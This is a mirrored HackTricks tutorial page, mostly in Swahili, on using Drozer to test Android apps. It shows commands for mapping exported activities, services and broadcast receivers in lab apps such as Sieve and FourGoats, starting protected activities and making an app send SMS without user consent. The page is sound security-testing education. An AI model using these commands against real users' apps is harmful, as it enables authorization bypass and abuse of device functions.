mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
256 lines
11 KiB
Markdown
256 lines
11 KiB
Markdown
# Drozer Tutorial
|
|
|
|
{{#include ../../../banners/hacktricks-training.md}}
|
|
|
|
|
|
|
|
## APKs to test
|
|
|
|
- [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (kutoka mrwlabs)
|
|
- [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz)
|
|
|
|
**Sehemu za mafunzo haya zilitolewa kutoka kwenye** [**Drozer documentation pdf**](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf)**.**
|
|
|
|
## Installation
|
|
|
|
Sakinisha Drozer Client ndani ya mwenyeji wako. Pakua kutoka kwenye [latest releases](https://github.com/mwrlabs/drozer/releases).
|
|
```bash
|
|
pip install drozer-2.4.4-py2-none-any.whl
|
|
pip install twisted
|
|
pip install service_identity
|
|
```
|
|
Pakua na sakinisha drozer APK kutoka kwa [toleo la hivi karibuni](https://github.com/mwrlabs/drozer/releases). Wakati huu ni [hii](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk).
|
|
```bash
|
|
adb install drozer.apk
|
|
```
|
|
### Kuanzisha Server
|
|
|
|
Agent inafanya kazi kwenye bandari 31415, tunahitaji [port forward](https://en.wikipedia.org/wiki/Port_forwarding) ili kuanzisha mawasiliano kati ya Drozer Client na Agent, hapa kuna amri ya kufanya hivyo:
|
|
```bash
|
|
adb forward tcp:31415 tcp:31415
|
|
```
|
|
Hatimaye, **anzisha** **programu** na bonyeza chini "**ON**"
|
|
|
|
.png>)
|
|
|
|
Na uunganishe nayo:
|
|
```bash
|
|
drozer console connect
|
|
```
|
|
## Interesting Commands
|
|
|
|
| **Commands** | **Description** |
|
|
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ |
|
|
| **Help MODULE** | Inaonyesha msaada wa moduli iliyochaguliwa |
|
|
| **list** | Inaonyesha orodha ya moduli zote za drozer ambazo zinaweza kutekelezwa katika kikao cha sasa. Hii inaficha moduli ambazo huna ruhusa sahihi za kuendesha. |
|
|
| **shell** | Anza shell ya Linux ya kuingiliana kwenye kifaa, katika muktadha wa Agent. |
|
|
| **clean** | Ondoa faili za muda zilizohifadhiwa na drozer kwenye kifaa cha Android. |
|
|
| **load** | Pakia faili inayoshikilia amri za drozer na uzitekeleze kwa mpangilio. |
|
|
| **module** | Tafuta na sakinisha moduli za ziada za drozer kutoka Mtandao. |
|
|
| **unset** | Ondoa kigezo kilichopewa jina ambacho drozer hupitisha kwa shell zozote za Linux ambazo inazalisha. |
|
|
| **set** | Hifadhi thamani katika kigezo ambacho kitapewa kama kigezo cha mazingira kwa shell zozote za Linux zinazozalishwa na drozer. |
|
|
| **shell** | Anza shell ya Linux ya kuingiliana kwenye kifaa, katika muktadha wa Agent |
|
|
| **run MODULE** | Tekeleza moduli ya drozer |
|
|
| **exploit** | Drozer inaweza kuunda exploits za kutekeleza kwenye kifaa. `drozer exploit list` |
|
|
| **payload** | The exploits need a payload. `drozer payload list` |
|
|
|
|
### Package
|
|
|
|
Tafuta **jina** la kifurushi kwa kuchuja kwa sehemu ya jina:
|
|
```bash
|
|
dz> run app.package.list -f sieve
|
|
com.mwr.example.sieve
|
|
```
|
|
**Taarifa za Msingi** za kifurushi:
|
|
```bash
|
|
dz> run app.package.info -a com.mwr.example.sieve
|
|
Package: com.mwr.example.sieve
|
|
Process Name: com.mwr.example.sieve
|
|
Version: 1.0
|
|
Data Directory: /data/data/com.mwr.example.sieve
|
|
APK Path: /data/app/com.mwr.example.sieve-2.apk
|
|
UID: 10056
|
|
GID: [1028, 1015, 3003]
|
|
Shared Libraries: null
|
|
Shared User ID: null
|
|
Uses Permissions:
|
|
- android.permission.READ_EXTERNAL_STORAGE
|
|
- android.permission.WRITE_EXTERNAL_STORAGE
|
|
- android.permission.INTERNET
|
|
Defines Permissions:
|
|
- com.mwr.example.sieve.READ_KEYS
|
|
- com.mwr.example.sieve.WRITE_KEYS
|
|
```
|
|
Soma **Manifest**:
|
|
```bash
|
|
run app.package.manifest jakhar.aseem.diva
|
|
```
|
|
**Uso wa shambulio** wa kifurushi:
|
|
```bash
|
|
dz> run app.package.attacksurface com.mwr.example.sieve
|
|
Attack Surface:
|
|
3 activities exported
|
|
0 broadcast receivers exported
|
|
2 content providers exported
|
|
2 services exported
|
|
is debuggable
|
|
```
|
|
- **Activities**: Labda unaweza kuanzisha shughuli na kupita aina fulani ya idhini ambayo inapaswa kukuzuia kuanzisha.
|
|
- **Content providers**: Labda unaweza kufikia data binafsi au kutumia udhaifu fulani (SQL Injection au Path Traversal).
|
|
- **Services**:
|
|
- **is debuggable**: [Learn more](#is-debuggeable)
|
|
|
|
### Activities
|
|
|
|
Thamani ya “android:exported” ya kipengele cha shughuli kilichosafirishwa imewekwa kuwa **“true”** katika faili la AndroidManifest.xml:
|
|
```markup
|
|
<activity android:name="com.my.app.Initial" android:exported="true">
|
|
</activity>
|
|
```
|
|
**Orodha ya shughuli zilizotolewa**:
|
|
```bash
|
|
dz> run app.activity.info -a com.mwr.example.sieve
|
|
Package: com.mwr.example.sieve
|
|
com.mwr.example.sieve.FileSelectActivity
|
|
com.mwr.example.sieve.MainLoginActivity
|
|
com.mwr.example.sieve.PWList
|
|
```
|
|
**Start activity**:
|
|
|
|
Labda unaweza kuanzisha shughuli na kupita aina fulani ya idhini ambayo inapaswa kukuzuia kuizindua.
|
|
```bash
|
|
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
|
|
```
|
|
Unaweza pia kuanzisha shughuli iliyosafirishwa kutoka **adb**:
|
|
|
|
- Jina la Kifurushi ni com.example.demo
|
|
- Jina la Shughuli iliyosafirishwa ni com.example.test.MainActivity
|
|
```bash
|
|
adb shell am start -n com.example.demo/com.example.test.MainActivity
|
|
```
|
|
### Watoa Maudhui
|
|
|
|
Post hii ilikuwa kubwa sana kuwa hapa hivyo **unaweza** [**kuipata kwenye ukurasa wake hapa**](exploiting-content-providers.md).
|
|
|
|
### Huduma
|
|
|
|
Huduma iliyosafirishwa inatangazwa ndani ya Manifest.xml:
|
|
```markup
|
|
<service android:name=".AuthService" android:exported="true" android:process=":remote"/>
|
|
```
|
|
Ndani ya msimbo **angalia** kazi ya \*\*`handleMessage`\*\* ambayo itakuwa **pokea** **ujumbe**:
|
|
|
|
.png>)
|
|
|
|
#### Orodha ya huduma
|
|
```bash
|
|
dz> run app.service.info -a com.mwr.example.sieve
|
|
Package: com.mwr.example.sieve
|
|
com.mwr.example.sieve.AuthService
|
|
Permission: null
|
|
com.mwr.example.sieve.CryptoService
|
|
Permission: null
|
|
```
|
|
#### **Wasiliana** na huduma
|
|
```bash
|
|
app.service.send Send a Message to a service, and display the reply
|
|
app.service.start Start Service
|
|
app.service.stop Stop Service
|
|
```
|
|
#### Mfano
|
|
|
|
Angalia msaada wa **drozer** kwa `app.service.send`:
|
|
|
|
.png>)
|
|
|
|
Kumbuka kwamba utaanza kutuma data ndani ya "_msg.what_", kisha "_msg.arg1_" na "_msg.arg2_", unapaswa kuangalia ndani ya msimbo **ni taarifa gani inatumika** na wapi.\
|
|
Kwa kutumia chaguo `--extra` unaweza kutuma kitu kinachofasiriwa na "_msg.replyTo_", na kwa kutumia `--bundle-as-obj` unaunda kitu na maelezo yaliyotolewa.
|
|
|
|
Katika mfano ufuatao:
|
|
|
|
- `what == 2354`
|
|
- `arg1 == 9234`
|
|
- `arg2 == 1`
|
|
- `replyTo == object(string com.mwr.example.sieve.PIN 1337)`
|
|
```bash
|
|
run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj
|
|
```
|
|
.png>)
|
|
|
|
### Broadcast Receivers
|
|
|
|
**Katika sehemu ya msingi ya taarifa za Android unaweza kuona ni nini Broadcast Receiver**.
|
|
|
|
Baada ya kugundua Broadcast Receivers hizi unapaswa **kuangalia msimbo** wao. Zingatia kwa makini **`onReceive`** kazi kwani itakuwa inashughulikia ujumbe uliopokelewa.
|
|
|
|
#### **Gundua zote** broadcast receivers
|
|
```bash
|
|
run app.broadcast.info #Detects all
|
|
```
|
|
#### Angalia wapokeaji wa matangazo wa programu
|
|
```bash
|
|
#Check one negative
|
|
run app.broadcast.info -a jakhar.aseem.diva
|
|
Package: jakhar.aseem.diva
|
|
No matching receivers.
|
|
|
|
# Check one positive
|
|
run app.broadcast.info -a com.google.android.youtube
|
|
Package: com.google.android.youtube
|
|
com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver
|
|
Permission: null
|
|
com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver
|
|
Permission: com.google.android.c2dm.permission.SEND
|
|
com.google.android.apps.youtube.app.PackageReplacedReceiver
|
|
Permission: null
|
|
com.google.android.libraries.youtube.account.AccountsChangedReceiver
|
|
Permission: null
|
|
com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver
|
|
Permission: null
|
|
```
|
|
#### Matukio ya **Mawasiliano**
|
|
```bash
|
|
app.broadcast.info Get information about broadcast receivers
|
|
app.broadcast.send Send broadcast using an intent
|
|
app.broadcast.sniff Register a broadcast receiver that can sniff particular intents
|
|
```
|
|
#### Tuma ujumbe
|
|
|
|
Katika mfano huu wa kutumia [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Mtoa Maudhui unaweza **kutuma SMS yoyote** kwa marudio yasiyo ya premium **bila kumuuliza** mtumiaji ruhusa.
|
|
|
|
.png>)
|
|
|
|
.png>)
|
|
|
|
Ikiwa unasoma msimbo, vigezo "_phoneNumber_" na "_message_" vinapaswa kutumwa kwa Mtoa Maudhui.
|
|
```bash
|
|
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!"
|
|
```
|
|
### Is debuggeable
|
|
|
|
APK ya uzalishaji haitakiwi kuwa debuggable.\
|
|
Hii inamaanisha kwamba unaweza **kuunganisha java debugger** kwenye programu inayotembea, kuichunguza wakati wa utekelezaji, kuweka breakpoints, kwenda hatua kwa hatua, kukusanya thamani za mabadiliko na hata kuzibadilisha. [InfoSec institute ina makala bora](../exploiting-a-debuggeable-applciation.md) kuhusu kuchimba zaidi wakati programu yako ni debuggable na kuingiza msimbo wa wakati wa utekelezaji.
|
|
|
|
Wakati programu ni debuggable, itaonekana katika Manifest:
|
|
```xml
|
|
<application theme="@2131296387" debuggable="true"
|
|
```
|
|
Unaweza kupata programu zote zinazoweza kudebug na **Drozer**:
|
|
```bash
|
|
run app.package.debuggable
|
|
```
|
|
## Tutorials
|
|
|
|
- [https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref](https://resources.infosecinstitute.com/android-penetration-tools-walkthrough-series-drozer/#gref)
|
|
- [https://github.com/mgcfish/mobiletools/blob/master/\_posts/2016-08-01-Using-Drozer-for-application-security-assessments.md](https://github.com/mgcfish/mobiletools/blob/master/_posts/2016-08-01-Using-Drozer-for-application-security-assessments.md)
|
|
- [https://www.hackingarticles.in/android-penetration-testing-drozer/](https://www.hackingarticles.in/android-penetration-testing-drozer/)
|
|
- [https://medium.com/@ashrafrizvi3006/how-to-test-android-application-security-using-drozer-edc002c5dcac](https://medium.com/@ashrafrizvi3006/how-to-test-android-application-security-using-drozer-edc002c5dcac)
|
|
|
|
## More info
|
|
|
|
- [https://blog.dixitaditya.com/android-pentesting-cheatsheet/](https://blog.dixitaditya.com/android-pentesting-cheatsheet/)
|
|
|
|
|
|
|
|
{{#include ../../../banners/hacktricks-training.md}}
|